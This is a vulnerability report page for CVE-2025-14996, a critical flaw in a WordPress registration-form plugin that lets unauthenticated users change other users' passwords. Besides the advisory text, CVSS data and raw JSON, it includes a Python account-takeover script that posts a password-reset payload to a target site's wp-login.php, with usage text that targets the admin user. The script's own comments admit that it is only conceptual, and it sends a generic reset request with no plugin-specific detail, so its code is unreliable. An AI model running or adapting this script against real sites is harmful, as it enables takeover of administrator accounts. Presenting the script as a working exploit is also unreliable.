Security Vulnerability Report
CVE-2025-14996 CVSS 9.8 CRITICAL

CVE-2025-14996

Published: 2026-01-06 05:16:00
Last Modified: 2026-04-15 00:35:42

Description

The AS Password Field In Default Registration Form plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary users' passwords, including those of administrators, and leverage that to gain access to their accounts.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AS Password Field In Default Registration Form ≤ 2.0.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14996 PoC - AS Password Field In Default Registration Form Account Takeover
# Target: WordPress site with vulnerable plugin installed

def exploit_password_takeover(target_url, username, new_password):
    """
    Exploit the privilege escalation vulnerability in AS Password Field plugin
    to change any user's password without authentication.

    Args:
        target_url: Base URL of the WordPress site
        username: Target username to takeover
        new_password: New password to set for the target user
    """
    target_url = target_url.rstrip('/')

    # Step 1: Get the registration form to obtain necessary tokens
    registration_url = f"{target_url}/wp-login.php?action=register"

    # Step 2: Construct password reset/request with the vulnerable endpoint
    # The plugin processes password updates without proper validation
    exploit_url = f"{target_url}/wp-login.php"

    # Step 3: Send password update request
    # Note: This PoC demonstrates the concept; actual exploitation may vary
    # based on plugin version and WordPress configuration
    payload = {
        'user_login': username,
        'pass1': new_password,
        'pass2': new_password,
        'action': 'resetpass'
    }

    try:
        # Attempt to trigger password change
        response = requests.post(exploit_url, data=payload, timeout=30)
        if response.status_code == 200:
            print(f"[*] Request sent for user: {username}")
            print(f"[*] Check if password was changed successfully")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-14996.py <target_url> <username> <new_password>")
        print("Example: python cve-2025-14996.py http://example.com admin MyNewPass123")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    exploit_password_takeover(target, user, password)

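References

https://plugins.trac.wordpress.org/browser/as-password-field-in-default-registration-form/tags/2.0.0/as-password-field-default-registration.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/061f022b-b922-4499-bb34-8ea91ba5ace3?source=cve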

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14996", "sourceIdentifier": "[email protected]", "published": "2026-01-06T05:15:59.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AS Password Field In Default Registration Form plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/as-password-field-in-default-registration-form/tags/2.0.0/as-password-field-default-registration.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/061f022b-b922-4499-bb34-8ea91ba5ace3?source=cve", "source": "[email protected]"}]}}